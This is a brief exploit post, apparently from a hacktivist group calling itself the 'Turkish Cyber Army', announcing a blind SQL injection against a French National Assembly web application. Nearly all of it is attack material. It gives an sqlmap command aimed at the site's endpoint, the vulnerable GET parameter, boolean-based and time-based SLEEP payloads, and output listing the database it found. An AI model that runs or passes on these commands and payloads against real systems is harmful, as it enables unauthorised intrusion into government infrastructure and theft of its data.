# Exploit Title : National Assembly of France ( Fransa Ulusal Meclis ) Blind SQL İnjection
# Team : Sanal Türk Ordusu "Turkish Cyber Army"
# Date : 21/03/2020
# Tested On : Kali Linux
# Contact : instagram.com/rootayyildiz/
sqlmap -u http://ww*****ale.fr/reserve_parlementaire/reserve_parlementaire_detail_json?beneficiaire=140763 --dbs --batch
Parameter: beneficiaire (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: beneficiaire=140763 AND 3879=3879
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: beneficiaire=140763 OR SLEEP(5)
available databases [1]:
[*] reserve_parlementaire
